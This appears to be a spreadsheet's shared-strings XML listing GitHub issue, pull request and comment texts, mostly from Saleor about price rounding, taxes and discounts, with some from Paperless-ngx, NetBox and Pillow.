![chrome-legacy-high-res-before](https://github.com/zulip/zulip/assets/170719/c9490a1e-e375-4f0a-bf94-761b6689aceb) | ![chrome-legacy-high-res-after](https://github.com/zuli</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</si>
  <si>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[#14861](https://github.com/netbox-community/netbox/issu</t>
  </si>
  <si>
    <t>4](https://github.com/netbox-community/netbox/issues/15894)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</si>
  <si>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</si>
  <si>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b.com/netbox-community/netbox/issues/10352)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</si>
  <si>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Add simple "delete to trash" functionality; . This pull request has been imported from jonaswinkler/paperless-ng#1249 and was originally opened by tribut on 2021-08-22 21:08:03. ---. Adds `PAPERLESS_THRASH_DIR`. When set, original files are moved there instead of being unlinked when a document is deleted. Implements the first point from https://github.com/jonaswinkler/paperless-ng/discussions/693. The idea is that this prevents accidental (or malicious) permanent deletion of a document. This is the most minimalist implementation I could think of, there are no changes to the GUI at all – just a directory that keeps the originals that would otherwise have been removed. Edit: Failing CI seems bogus (frontend ran into npm timeout and coveralls says coverage decreased by 0.003% - rounding error?).</t>
  </si>
  <si>
    <t>ssues/5517"&gt;#5517&lt;/a&gt; [&lt;a href="https://github.com/kmilos"&gt;&lt;code&gt;@ ​kmilos&lt;/code&gt;&lt;/a&gt;]&lt;/li&gt;. &lt;li&gt;Use the Windows method to get TCL functions on Cygwin &lt;a href="https://github-redirect.dependabot.com/python-pillow/Pillow/issues/5807"&gt;#5807&lt;/a&gt; [&lt;a href="https://github.com/DWesl"&gt;&lt;code&gt;@ ​DWesl&lt;/code&gt;&lt;/a&gt;]&lt;/li&gt;. &lt;li&gt;Changed error type to allow for incremental WebP parsing &lt;a href="https://github-redirect.dependabot.com/python-pillow/Pillow/issues/5404"&gt;#5404&lt;/a&gt; [&lt;a href="https://github.com/radarhere"&gt;&lt;code&gt;@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t>
  </si>
  <si>
    <t>quantize</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>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href="https://github.com/radarhere"&gt;&lt;code&gt;@ ​radarhere&lt;/code&gt;&lt;/a&gt;]&lt;/li&gt;. &lt;li&gt;Exclude carriage return in PDF regex to help prevent ReDoS &lt;a href="https://github-redirect.dependabot.com/python-pillow/Pillow/issues/5912"&gt;#5912&lt;/a&gt; [&lt;a href="https://github.com/radarhere"&gt;&lt;code&gt;@ ​radarhere&lt;/code&gt;&lt;/a&gt;]&lt;/li&gt;. &lt;li&gt;Image.NONE is only used for resampling and dithers &lt;a href="https://github-redirect.dependabot.com/python-pillow/Pillow/issues/5908"&gt;#5908&lt;/a&gt; [&lt;a href="https://github.com/radarhere"&gt;&lt;code&gt;@ ​radarhere&lt;/code&gt;&lt;/a&gt;]&lt;/li&gt;. &lt;li&gt;Fixed freeing pointer in ImageDraw.Outline.transform &lt;a href="https://github-redirect.dependabot.com/python-pillow/Pi</t>
  </si>
  <si>
    <t>FLOAT32</t>
  </si>
  <si>
    <t>mption_finished.send(. File "/usr/local/lib/python3.9/site-packages/django/dispatch/dispatcher.py", line 176, in send. return [. File "/usr/local/lib/python3.9/site-packages/django/dispatch/dispatcher.py", line 177, in &lt;listcomp&gt;. (receiver, receiver(signal=self, sender=sender, **named)). File "/usr/src/paperless/src/documents/signals/handlers.py", line 56, in set_correspondent. potential_correspondents = matching.match_correspondents(document, classifier). File "/usr/src/paperless/src/documents/matching.py", line 30, in match_correspondents. return list(. File "/usr/src/paperless/src/documents/matching.py", line 31, in &lt;lambda&gt;. filter(lambda o: matches(o, document) or o.pk == pred_id, correspondents),.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[2022-11-28 08:12:27,167] [DEBUG] [paperless.parsing.tesseract] Deleting directory /tmp/paperless/paperless-qd6dz7_6. ```. ### Browser logs. _No response_. ### Paperless-ngx version. 10.0. ### Host OS. Raspberry Pi 64. ### Installation method. Docker - official image. ### Browser. Firefox. ### Configuration changes. _No response_. ### Other. _No response_</t>
  </si>
  <si>
    <t>Shops in EU: Net prices for customers outside EU should exclude standard VAT even when prices in dashboard include VAT.; Hi ,. we have entered the gross prices in the dashboard of our shop . Now we have VAT calculations, but that causes a problem for customers outside the EU or business customers, who both don’t pay VAT (at least not to us).:. ### What I'm trying to achieve. Correct calculation of net prices for other countries (in our case with 0 % VAT outside EU or business customers) even when prices in the dashboard are gross prices. ### Steps to reproduce the problem. 1. Enter prices with VAT. 2. Make a test order for a customer with 0 % VAT or any rate different to your own country’s. 3. you will get net price = gross price, which is correct, but it’s the price including the standard VAT. ### What I expected to happen. Net price for customers outside the EU and for companies (VAT = 0 %) should be price/(1 + tax_rate), i. e. the price without VAT. Example: Price of a book is 23 €, which is the price entered in the dsshboard and the price displayed in the shop. As we also sell to private customers, we have to display gross prices. For a customer outside the EU the tax is 0 %, but. Saleor displays net price = gross price = 23 € instead of 23/1.07 = 21.50 € (rounded). One workaround could be to always enter net prices in the dashboard, which is a bit cumbersome if you have all lists with gross prices. And apart from that you will have rounding problems: 1.07 * 21.50 € = 23.005 €., rounded 23.01 € (at least if normal business rounding is applied) So you can’t have a gross price of exactly 23 € for 7 % VAT. . **System information**. Operating system: Debian Stretch. Browser: any.</t>
  </si>
  <si>
    <t>Tests are failing randomly due to an invalid conversion of ISO8601 datetimes; A float rounding issue was fixed in aniso8601 7.x. We are still using 6.x because this is the version currently used by graphene. To avoid any issues with upgrading dependencies, we will have to wait for https://github.com/graphql-python/graphene/pull/1009 to be merged and then the issue will be fixed once we upgrade the graphene version.</t>
  </si>
  <si>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t>
  </si>
  <si>
    <t>Add missing quantize method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t>
  </si>
  <si>
    <t>Fix crashing system when avalara is improperly configured; Fixing issue with `None` reaching quantize price - it was caused by improperly configured Avalara, so I add the check to prevent such a situation. - Raise an error when avalara API return error in response. - Add authentication validation when activating avalara plugin. - Change the default value of `PluginConfiguration` to False.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[x] The changes are tested. * [x] GraphQL schema and type definitions are up to date. * [x] Changes are mentioned in the changelog.</t>
  </si>
  <si>
    <t>Rounding for Payment; ### What I'm trying to achieve. In some currencies (at least in BDT), fractional payment amount is a problem (especially in cash on delivery). You can't even pay in the fractions since we don't have coins for them in circulation anymore. Some sort of optional rounding mechanism is needed. ### Describe a proposed solution. I don't have any. However, for my current project I have to modify the total checkout amount calculation (I might have to add an 'adjustment' field to the `TaxedMoney` type for transparency in the calculations.), and add fields for adjustment money fields in the order. I don't think doing it in plugin-level will be possible.</t>
  </si>
  <si>
    <t>Rework checkout total calculation; Change the way of `checkout.total` calculation when taxes are disabled, to always sum line totals and shipping. This change is because the voucher is already propagated in line totals. We included this voucher once again in the total calculation, which was causing small rounding issues.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</si>
  <si>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or customers we introduce a new way of calculating the sale amounts. . To calculate apply sales on checkout we use:. ```mermaid. graph TD. A{{For each sale, that could be, applied at checkout. Calculate proper discounts amounts for lines}} --&gt;|Fixed discount| B. B[Apply discount to the line total. The discount value should be limited by line_total]. A --&gt;|Percentage discount| C. C[Use Algorithm 1 to calculate proper line discounts for percentage sales]. C --&gt; D. B --&gt; D. D[For each line, choose the best available discount and assign it to the checkout/order line]. ```. **Algorithm 1** - Calculate discount values for a percentage sale:. ```mermaid. graph TD. A[Calculate the total amount of lines qualified for the sale&lt;br&gt;remaining_total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[x] Add models. - [x] Clear models (~1h). - [x] Datamigrations (~6h). - [x] Adjust migration to zero downtime policy (~4h). - [x] Fetch all Sales that could be applied. - [x] Converting Salse -&gt; ObjectDiscounts. - [x] Implement new calculation flow (~10h). - [x] Adjust calculation flow to include new discounts objects (~2h). - [x] Remove old sale calculation from price recalculation flow (~4h). - [x] Make deprecated fields backward compatible (~3h). - [x] Drop unused discounts argument . - [x] Add test for fixed Sale is properly calculated for lines with quantity &gt; 1. - [ ] In the migration guide &amp; changelog d</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> Voucher, related_name="+", blank=True, null=True, on_delete=models.SET_NULL. ). class Meta:. abstract = True. class CheckoutDiscount(BaseDiscount):. checkout = models.ForeignKey(. "checkout.Checkout",. related_name="discounts",. blank=True,. null=True,. on_delete=models.CASCADE,. ). class CheckoutShippingDiscount(BaseDiscount):. checkout = models.ForeignKey(. "checkout.Checkout",. related_name="shipping_discounts",. blank=True,. null=True,. on_delete=models.CASCADE,. ). ```. ## New percentage voucher calculation flow. To provide the best Voucher value for customers we introduce a new way of calculating the voucher discount amounts. ```mermaid. graph TD. A[Calculate the total amount of lines qualified for the voucher&lt;br&gt;remaining_total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 ] Add models. - [ ] Datamigrations. - [ ] Adjust migration to zero downtime policy. - [ ] Generate discount objects for:. - [ ] Shipping Voucher. - [ ] Specific Product Voucher. - [ ] Entire Order Voucher. - [ ] Handle apply once per order flag. - [ ] Update lines and shipping prices (⚠️ Entire order discount should be propagated by Tax System) . - [ ] Refactor add a voucher to checkout mutation. - [ ] Adjust order to create a flow to new calculations. - [ ] `orderCreateFromCheckout` mutation. - [ ] `checkoutComplete` mutation. - [ ] Voucher calculation doesn't validate the possibility to apply voucher. This</t>
  </si>
  <si>
    <t>Bug: Incorrect tax calculation in Order and Checkout total calculations; ### What are you trying to achieve? The current implementation of the `update_order_prices_with_flat_rates` and `update_checkout_prices_with_flat_rates` functions is causing the tax calculation to be inaccurate. The functions calculate the gross and net amounts on a per-line basis and then sum up the gross amounts for all lines, which leads to a precision issue when rounding multiple items. The cause of this issue is the rounding of the gross amounts, which is done on a per-line basis before summing them up. This leads to a loss of precision when rounding multiple items. I was thinking that this could be fixed by calculating the tax on the entire order/checkout subtotal but there could be lines with different taxes. Given this I think that the logic should apply the rounding at the order/checkout total calculation and leave the line items without the rounding. This brings another issue with how the product gross amount is displayed in the dashboard already rounded up, not sure if this should be changed to only display the net amount. ### Steps to reproduce the problem. I created an order showing the issue in a saleor environment: [GrapqhQL Playground here](https://test-org.saleor.cloud/graphql/#saleor/N4IgjiBc4K4KYCcCeACA8ggJogInALgIYCWANgM4AUAJMZpCgJI4CEAlCsADoB2KKAeyyJKdBrUwduffinJF8Mcr1koADoSQBbOD3wBlBUpWzyAC2Jq1xHgHMAKoQAeAJUL44J-vgFFSnL1kAYxgEBF0gpED+HgIAmVV+ELCIqITEwi0BGD1olABfPKIneMTg0PCeSLz+TOzc9P5CxpRbBAFyclKylGTK6pbarJz8PObVcYLefJAAGhABKBAMbAQ8IjJyOZAANyXpfi4QOiOGI-sAZgApAGsALQANRgA2AFkALxuAFlf7ADUtAA5ABWAE18GgcK8AEyA4gABnhoK0AFEvgAZADqKIA7ncAOIAVXwd2BtneoOhf1IgKJPy0AKO0xA+SAA). ```json. {. "data": {. "order": {. "status": "FULFILLED",. "paymentStatus": "FULLY_CHARGED",. "shippingTaxRate": 0.07,. "total": {. "currency": "USD",. "net": {. "currency": "USD",. "amount": 10. },. "tax": {. "currency": "USD",. "amount": 0.72 // This should be 0.70. },. "gross": {. "currency": "USD",. "amoun</t>
  </si>
  <si>
    <t>Fix incorrect tax calculation in Order and Checkout total calculations; I want to merge this change because it fixes an issue with lines price rounding when applying taxes. See the following issue https://github.com/saleor/saleor/issues/12348 for a more detailed description.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</si>
  <si>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apply the reward predicates that will define which items from the cart should be discounted. - The reward predicate could be defined only for `SPECIFIC_PRODUCT_DISCOUNT` reward type. ### Acceptance Criteria. &lt;!-- Conditions that a feature must satisfy to be approved by QA. - Functional use case:. - Permissions: As USER/APP with permision `XYZ' I should be able to 'action". - Webhooks: Webhook `name` event should be sent for every updated `instance name`. - Support for old versions: After updating, it is possible to retrieve data created in older (3.1, 3.5, 3.7) Saleor versions. - Error handling: Should be handled according to 'policy_name'. - Other use-cases: ID or externalReference can be used to identify object. - Non-functional use case. - X objects can be updated in one mutation. --&gt;. - [ ] Support for old versions: the old sales should work as before. - [ ] Allow CRUD of promotion rules. - [ ] The Promotion rules support all functionalities as old sales. - [ ] Ensure that the rounding issue does not appear - check the case when multiple items of a single variant are bought with a percentage discount on this product. ## 2. API changes. ### Mutations. - Add `promotionCreate` mutation - requires `MANAGE_DISCOUNTS`. - Add validation for `rewardValueType` - it's required for the `cataloguePredicate` (not required in the API as after introducing the `checkoutAndOrderPredicates` it won't be required anymore). &gt; ❗ Provided `channels` in `PromotionRuleInput` must share the same currency when `CataloguePredicate` contains any price-based condition. Otherwise channels can be multi-currency. &gt; ❗ Required validation for `CataloguePredicateInput` - on each level, only one predicate type is allowed. &gt; ⚠️ For now catalogue predicates will allow only providing `ids` to narrow down the scope of this RFC. The predicates will be extended. . ```graphql. type Mutation {. ... promotionCreate(. input: PromotionCreateInput! ): PromotionCreate @doc(category: "Discounts"). }. type Promot</t>
  </si>
  <si>
    <t>Fix failing rounding on Weight; I want to merge this change because it solves the issue reported here: https://github.com/saleor/saleor/issues/15272.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</si>
  <si>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failing rounding on Weight; I want to merge this change because it is port of changes from: https://github.com/saleor/saleor/pull/15275.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</si>
  <si>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error when discount_amount is 0 for taxes webhook payload; I want to merge this change because when `discount_amount` is 0 in `generate_checkout_payload_for_tax_calculation` it will throw an `AttributeError: 'int' object has no attribute 'quantize'`. This PR is addressing that issue.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</si>
  <si>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</si>
  <si>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rounding-to-core</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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3.20.51; * Release 3.20.51 (3915617d6e). * Fix rounding issue when propagating order/checkout level discount on lines (#17004) (884120791f). * Optimize ProductVariantUpdate mutation (#16981) (5621869e2c).</t>
  </si>
  <si>
    <t>## What's Changed. * Optimize ProductVariantUpdate mutation by @tomaszszymanski129 in https://github.com/saleor/saleor/pull/16981. * Fix rounding issue when propagating order/checkout level discount on lines by @IKarbowiak in https://github.com/saleor/saleor/pull/17004. * Release 3.20.51 by @IKarbowiak in https://github.com/saleor/saleor/pull/17031. **Full Changelog**: https://github.com/saleor/saleor/compare/3.20.50...3.20.51</t>
  </si>
  <si>
    <t>quantize-zero-</t>
  </si>
  <si>
    <t>* Prevent performing both transaction and payment checkout process at the same time (#15971) (#16072) (44ffcf3648). * Add more fields to external shipping method payload parsing (#15935) (887c0abe7b). * Fix issue with voucher on draft order when there is no user associated with draft order (#16048) (4a34d1369e). * Fix order predicate handlers (#16057) (1aade5fa2e). * Merge pull request #16049 from saleor/SHOPX-645-price-quantize-zero-3.19 (2864ff11c3). * Merge pull request #16042 from saleor/SHOPX-671-transaction-id-validation (af317df74a). * Remove changelog entry (9219a06cc0). * Use early return when discount_amount = 0 for webhook payload (3d40db5eb1). * Fix error when discount_amount is 0 for taxes webhook payload (d11940f2aa). * Fix error when discount_amount is 0 for taxes webhook payload (78fc52a820). * Remove unused type-ignore (f754eecc2d). * Add information to changelog (39edd618b2). * Validate type of id passed to transaction query (abdcb8cfe0)</t>
  </si>
  <si>
    <t>* Fix failing rounding on Weight (#15288) (f61cb99984). * Fix creating promotion rule without catalogue predicate (#15286) (35318db4bb). * Fix promotionCreate mutation to allow creating rules with no channels specified. (#15250) (3d22c4dd8e)</t>
  </si>
  <si>
    <t>Welcome to the 3.12 release of Saleor! ### Breaking changes. - Change the discount rounding mode - #12041 by @IKarbowiak. - Change the rounding mode from `ROUND_DOWN` to `ROUND_HALF_UP` - it affects the discount amount and total price of future checkouts and orders with a percentage discount applied. The discount amount might be 0.01 greater, and the total price might be 0.01 lower. E.g. if you had an order for $13 and applied a 12.5% discount, you would get $11.38 with a $1.62 discount, but now it will be calculated as $11.37 with $1.63 discount. - Include specific products voucher in checkout discount - #12191 by @IKarbowiak. - Make the `specific product` and `apply once per order` voucher discounts visible on the `Checkout.discount` field. Previously, the discount amount for these vouchers was shown as 0. - `stocks` and `channelListings` inputs for preview `ProductVariantBulkUpdate` mutation have been changed. Both inputs have been extended with:. - `create` input - list of items that should be created. - `update` input - list of items that should be updated. - `remove` input - list of objects ID's that should be removed. If your platform relies on this preview feature, make sure you update your mutations stocks and channel listings inputs from:. ```. {. "stocks/channelListings": [. {. ... }. ]. }. ```. to:. ```. {. "stocks/channelListings": {. "create": [. {. ... }. ]. }. }. ```. - Media and image fields now default to returning 4K thumbnails instead of original uploads - #11996 by @patrys. ### GraphQL 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t>
  </si>
  <si>
    <t>Hi,. Really impressive work – I think this is a feature many Paperless users have been hoping for! That said, I believe it’s important to clearly highlight in both the documentation and the UI that using an external LLM service may expose highly sensitive data — tax IDs, health records, banking info, passwords, and more. Many of us trust Paperless with our most private documents, and it's easy to forget the implications when enabling such powerful features. I'm not overly cautious when it comes to data privacy, but users should be fully informed of the risks before opting in to LLM integration (same goes for external OCR services). While having a local option is great, many projects that offered both local and external LLM integration have seen that most users go for the easy route — just pasting an API key. Running your own service locally is often too complex or hardware-intensive for average users. This makes it even more important to communicate the privacy implications clearly. A thoughtful UX element to control LLM access — e.g., by assigning to each tag whether it grants full access, metadata-only, or no access — with a safe default of “share nothing” would go a long way in balancing utility and safety. It would also be helpful if a few additional external LLM providers were supported out of the box, along with clear documentation that outlines the pros and cons of each option — especially in terms of data privacy. This would enable users to make an informed, context-aware decision based on their risk tolerance and use case. Thanks again for pushing Paperless forward in such exciting and ambitious directions!</t>
  </si>
  <si>
    <t>tion of "machine learning" should specify "(not LLM based)" to unambiguously clarify the distinction with "AI" features. Maybe "good old machine learnig (not LLM based)" ? Or rather something like "rule learning". In any case I believe machine learning will confuse people a lot. 9. As AI is a fresh field, I believe most of those design choices have to be documented in a special doc page lile "AI FAQ". Seems like a sound time investment to avoid confusing newbies. LLMs are godsent for this. ### Misc. 1. I personnaly decided a few years ago to bet on langchain instead of llamaindex and have not regretted. Curious as to your reason for choosing them now. Not that langchain i perfect, faaaar from it. 2. I'd advise against using a file called tools.py as it evokes tool calling. Maybe base_models.py ? ### Implementation. 1. Why should embeddings only be using openai or huggingface? I think ollama models can even be good enough. I'm personnaly using snowflake-arctic-embed2:Q4_K_M (has to quantize it myself though). There are others from BGE like the m3 for example. Maybe the abolute best default would be the [multilingual potion from minish lab](https://github.com/MinishLab/model2vec), it's super small yet useful. There is also mistral, cohere, etc. In any case I highly suggest not using ever the all-mini-l6-v2. In my experience they silently crop anything above a very short token limit and they training leave much to be desired and were mostly based on tweet like snippets. There are many other alternatives, but I don't know what kind of hardware you're aiming at. 2. The default should not be gpt-3.5-turbo, at the very least IIRC 4o-mini is pareto improvement I believe, but there are peobably even saner defaults since. Same with llama3, maybe qwen3 are better everywhere? As stated before it depends on if they need to be able to ingest images as well as text, and structured output. Qwen VL comes to mind but there are caveats with the new buggy backend of ollama for the flas</t>
  </si>
  <si>
    <t>### Sprints proposal (meeting notes, 8th August 2016). 1. Cart related issues. - Cart no longer in session #468 . - Simnplify delivery groups handling #538. - API update for items and variants #539. 2. Categories and taxonomies. - Split into main category and additional taxonomies. - Integration with Google Merchant. 3. Drop obsolete dependencies. - Dropping Satchless API. - Move `get_price_per_item` to helper (with rounding support). - Dropping Class-based views. - Dropping `weight` from products. 4. Payments. - Merge summary step with payments. - Create order model on payment success. - Create order from payment. 5. Better payments integration (requires Payments sprint first). - Use Payment model for order creation. 6. Dashboard upgrade (exact scope TBD). - Rethink how we extend dashboard.</t>
  </si>
  <si>
    <t>Thank you for report, @yxnkzg! We've recently revamped a lot of our money handling, so this seems like wrong type being passed around. Looks like this [line is to blame](https://github.com/mirumee/saleor/blob/master/saleor/order/models.py#L299). `line.unit_price_gross.quantize(Decimal('0.01'))` returns `Money()` so we'll need to add `.amount` at end of it to drop it to `Decimal`. Looks like we'll also need to add tests to enforce that our payment data is build correctly.</t>
  </si>
  <si>
    <t>I am doubtful about introducing maybe-optional parameters into the API (`shipping_address_id`). We are trying to be as consistent as possible; in my opinion, it may cause confusion when frontend client sees both fields - `shipping_address_id` and `shipping_address` - as _optional_, decides to not fill any and then gets an error message that, notwithstanding one is required. AFAIK GraphQL does not specify such a situation when _one_of_ (not explicitly named) parameter is required. @jxltom What is the use-case for this? I am working mainly on the backend side, but maybe there is a case when it's worth stretching our tolerance of level of inconsistency.</t>
  </si>
  <si>
    <t>Wouldn't it be better to handle quantization on the level where Saleor runs plugins methods connected with a price? - like `saleor/checkout/calculations.py`. . Thanks to it we will be sure that all plugin returns a quantized price.</t>
  </si>
  <si>
    <t>After looking at the implementation, it appears the attributes are returned already sorted by by the assigned indices. This eliminates my current use case of just wanting to display them in order. I'll leave this open because it does make sense that this variable should be made available to the storefront anyways. Perhaps for scenarios where there needs to be a custom fallback ordering algorithm for attributes with the same ordering index.</t>
  </si>
  <si>
    <t>Task linked: [SALEOR-4420 Missing quantize on price fields in webhooks](https://app.clickup.com/t/2549495/SALEOR-4420)</t>
  </si>
  <si>
    <t>Hint for testing edge case with rounding issue: . Sale inactive or removed . Taxes. ```. "channel":. "id":"Q2hhbm5lbDox". "name":"Channel-USD". "__typename":"Channel". }. "displayGrossPrices":true. "pricesEnteredWithTax":false. "chargeTaxes":true. "taxCalculationStrategy":"TAX_APP". ```. Avatax plugin configured and activated in default-channel . Product price netto 35 USD. Checkout create . ```. {. "checkoutInput": {. "channel": "default-channel",. "email": "dustin.gonzalez@example.com",. "lines": [. {. "quantity": 1,. "variantId": "UHJvZHVjdFZhcmlhbnQ6MTcy". }. ],. "shippingAddress": {. "country": "US",. "city": "San Diego",. "postalCode": "92128",. "streetAddress1": "1852 Hood Avenue",. "firstName": "jon",. "lastName": "doe",. "companyName": "xyz",. "streetAddress2": "123abc",. "countryArea": "California",. "phone": "+48123456789". },. "billingAddress": {. "country": "US",. "city": "San Diego",. "postalCode": "92128",. "streetAddress1": "1852 Hood Avenue",. "firstName": "jon",. "lastName": "doe",. "companyName": "xyz",. "streetAddress2": "123abc",. "countryArea": "California",. "phone": "+48123456789". }. }. }. ```. checkoutDeliveryMethodUpdate, use ID of first available shipping method returned for checkout. checkoutPaymentCreate plugin mirumee. checkoutComplete. It creates below order. If you look at order.lines.unitPrice and order.lines.undiscountedUnitPrice gross and tax have diffrent values. ```. "data": {. "checkoutComplete": {. "order": {. "id": "T3JkZXI6MTMwZjBhZmEtM2I0Yi00ZWMyLTliOTEtYzZlNWU2OTVjZjM5",. "number": "36",. "status": "UNFULFILLED",. "paymentStatus": "FULLY_CHARGED",. "total": {. "gross": {. "amount": 43.81,. "currency": "USD". },. "net": {. "amount": 40.66,. "currency": "USD". },. "tax": {. "amount": 3.15,. "currency": "USD". }. },. "lines": [. {. "id": "T3JkZXJMaW5lOjU0MDM4YjBmLTZmYjctNDZlZS1hMTRhLTZmNDU2YWYzNjg1Ng==",. "productName": "Nebula Night Sky Paint",. "taxRate": 0.0775,. "totalPrice": {. "gross": {. "amount": 37.72,. "currency": "</t>
  </si>
  <si>
    <t>Presorted</t>
  </si>
  <si>
    <t>ayment" ON ("order_order"."id" = "payment_payment"."order_id"). WHERE (NOT("order_order"."status" = 'UNFULFILLED'). 	AND "payment_payment"."charge_status" IN('partially-refunded', 'fully-charged'). 	AND "payment_payment"."is_active". 	AND ("order_order"."created" AT TIME ZONE 'UTC')::date &gt;= '2023-10-25'). 	and "order_order"."metadata"-&gt;&gt;'PickerId'= 'VXNlcjoxMTIwMDE='. ORDER BY. 	"order_order"."created" DESC,. 	"order_order"."status" DESC,. 	"order_order"."id" DESC. LIMIT 100). Limit (cost=326.97..32930.04 rows=100 width=27) (actual time=2359.362..2359.369 rows=22 loops=1). Output: order_order.id, order_order.private_metadata, order_order.created, order_order.status. Buffers: shared hit=214774. -&gt; Incremental Sort (cost=326.97..916799.28 rows=2811 width=27) (actual time=2359.361..2359.364 rows=22 loops=1). Output: order_order.id, order_order.private_metadata, order_order.created, order_order.status. Sort Key: order_order.created DESC, order_order.status DESC, order_order.id DESC. Presorted Key: order_order.created. Full-sort Groups: 1 Sort Method: quicksort Average Memory: 26kB Peak Memory: 26kB. Buffers: shared hit=214774. -&gt; Nested Loop (cost=0.85..916672.78 rows=2811 width=27) (actual time=0.427..2359.342 rows=22 loops=1). Output: order_order.id, order_order.private_metadata, order_order.created, order_order.status. Buffers: shared hit=214774. -&gt; Index Scan Backward using order_order_idx_created on public.order_order (cost=0.43..894242.29 rows=2812 width=27) (actual time=0.395..2359.116 rows=22 loops=1). Output: order_order.id, order_order.created, order_order.tracking_client_id, order_order.user_email, order_order.token, order_order.billing_address_id, order_order.shipping_address_id, order_order.user_id, order_order.total_net_amount, order_order.voucher_id, order_order.language_code, order_order.shipping_price_gross_amount, order_order.total_gross_amount, order_order.shipping_price_net_amount, order_order.status, order_order.shipping_method_name, order_order.sh</t>
  </si>
  <si>
    <t>The assumptions listed below `Order line prices` chapter are valid only when provided price in Saleor are in `.net` (you're operating there on `net` value. If you will have Saleor prices provided in `gross` all statements listed there will be valid for `gross`. &gt; undiscounted_base_unit_price_amount = undiscounted_unit_price_net_amount (not sure here!!!). I might be wrong, but This could not true. Base is calculated by Saleor based on the prices in the database. The undiscounted can be a value calculated by plugin. You could have here a difference like 0.01 (but I am not totally sure, how it exactly looks like after providing the flat rates feature). &gt; unit_price_net_amount = total_price_net_amount / quantity. You have `total_price_net_amount = quantity * base_unit_price_amount + propagated order level discount`. Assuming, that your `total_price_net_amount` is 9,05 (assuming after applying the discount) and qt:2, if you make a `total_price_net_amount / quantity` you will get 4.525, which after rounding gives you 4.52 or 4.53. So using the unit price to calculate the total you will get 9.04 or 9.06 which is different than previous one. So in the case of calculating the prices we should avoid flows like this one:. unit_price -&gt; unit_price * quantity (total) -&gt; total/quantity(unit_price) .</t>
  </si>
  <si>
    <t>@ilonamanole, the `DEFAULT_DECIMAL_PLACES` shouldn't be changed. It only determines how many decimal places will be saved on DB. In the API the prices are returned with the rounding that depends on the currency, so e.g. if your prices are in `JPY` 0 decimal places will be returned. I hope it helps 😊</t>
  </si>
  <si>
    <t>I wrote a Postgres function to turn the string representation of an RD into its canonical int8 representation. int8 types are used where they shouldn't be necessary due to Postgres' lack of unsigned types. This could be cleaned up and would improve validation with use of domains to implement unsigned types. I also implemented the reverse function to error check, and it may be useful if the choice is made to store internally as an int8 instead of VARCHAR(21). Note that the first 2 bytes of the RD are the type specifier, so type 0 (ASN2:INT4) will always sort before type 1 (IP:INT2), which is likewise before type 2 (ASN4:INT2). This might not be the most desirable, but I hope each org is only using one of the 3 available types. I suppose a composite type could be created that would allow sorting by the integer representation of the administrator subfield, then the assigned number, but this seems a bit excessive. https://gist.github.com/ktims/6cf9e5bb252b91c61309f554c9d8496d</t>
  </si>
  <si>
    <t>Some devices also produce/consume nonstandard POE schemes. There's some general agreement on what "passive POE mode A" and "passive POE mode B" means, but even then there's a variety of other specs to consider. Ubiquiti, for example, does a lot of passive POE. They have a [fun compatibility matrix](https://help.ubnt.com/hc/en-us/articles/115000263008--UniFi-Understanding-PoE-and-How-UniFi-Devices-are-Powered#supported%20unifi%20devices) of which UniFi APs work with which kinds of power, overflowing with asterisks and parentheticals because nothing can ever be simple. Worse, a single Ubiquiti switch port might be able to output both passive POE of a particular variety and standard POE. Voltages are critically important, both outputs and tolerances. For example, you might have a 48V passive POE adapter paired with a UAP-AC-PRO, and that's fine -- but be careful not to plug it into a UAP-AC-LR [lest the magic smoke escape](https://community.ubnt.com/t5/UniFi-Wireless/Warning-UAP-AC-LITE-and-UAP-AC-LR-with-UniFi-Switch-on-PoE/td-p/1771809). Yes, these products are [adjacent in the brochure](https://dl.ubnt.com/datasheets/unifi/UniFi_AC_APs_DS.pdf). Yes, this is terrible. Amperages and pinouts are important too, hence the [whole pile of different Ubiquiti power adapters](https://dl.ubnt.com/datasheets/poe/PoE_Adapters_DS.pdf). Yes, they sell two different 24V 24W passive POE adapters with different pinouts. Yes, this is terrible. Mikrotik runs a fair amount of nonstandard POE as well. Some of their devices raise an interesting point: for example, the [hAP](https://routerboard.com/RB951Ui-2nD) can receive power over `ether1` while providing power over `ether5`. This configuration is fixed in hardware, and as long as I'm documenting the POE role of each interface, I would like to distinguish source from sink. I think "POE" should be a dropdown modifying an interface, independent of media type, and it definitely needs to support more than three options.</t>
  </si>
  <si>
    <t>I beg to differ on that one, as it would give more flexibility to the users if it is their decision to make sense of a status. It's not really a huge change, but would widen the options a lot to cover more use-cases. Like, you can have a bad CAT cable in a bonded network; it's not a huge drama because the bond will generally be set up to provide fault tolerance, but you would want to mark the cable as failed so next time you go to the location for maintenance you don't forget to replace it. Granted the NICs could be bad, but then you'd still want to replace the cable to check. Or like in my case where I wanted to set a powerfeed to reserved.</t>
  </si>
  <si>
    <t>You are right, I missed really giving a use case above. With that sentence, I just wanted to say that when a manufacture gives me the maximum draw in 0.1 W resolution, than I would like that being represented in my device type. I don’t like rounding just because of technical limitations. My use case is for example single board computers that have a very low power consumption. There it makes a difference if we are talking about 0.7 W or 1.4 W. And for tuning devices to be power efficient. Maybe you found out that disabling 2.4 GHz on an AP saves 0.5 W of power and you would like to track that in NetBox. There are also places were you don’t have plenty of power, like in off-grid/RV were people still want to run networks.</t>
  </si>
  <si>
    <t>The `utilization_graph` tag used to render these graphs currently supports warning (yellow) and danger (red) thresholds; these default to 75 and 90, respectively. It should be simple to extend this to include a special style/color for 100 values, although we might also need to look into rounding (e.g. 99.99% not being the same as 100%).</t>
  </si>
  <si>
    <t>Thanks @atownson, but I'm going to fold this one into #9881 as I feel like the rounding issue is better captured there. We can also address the alignment under that issue.</t>
  </si>
  <si>
    <t>To avoid any confusion resulting from rounding, we should convey the exact value unless it can be expressed as an exact number of gigabytes or terabytes.</t>
  </si>
  <si>
    <t>&gt; When sorted by IP addresses the would rows make sense, otherwise they don't - or am I missing something? I can't remember exactly (so don't hold me to this), but I believe it's a question of it being hard to implement with the way ordering and the addition of the available IP rows work. The solution is a compromise as the default sort is already sorted by IP. The thing that would be missing is a reversed sort by IP address, but the amount of work required is probably not worth it. . &gt; The question is, however, why the list initially came up sorted by "status" when I first opened it ... is the sorting stored somewhere? Yes all sorting (and chosen columns) is stored on a user-basis. You can see them and reset them in the bottom of the preference view: /user/preferences/</t>
  </si>
  <si>
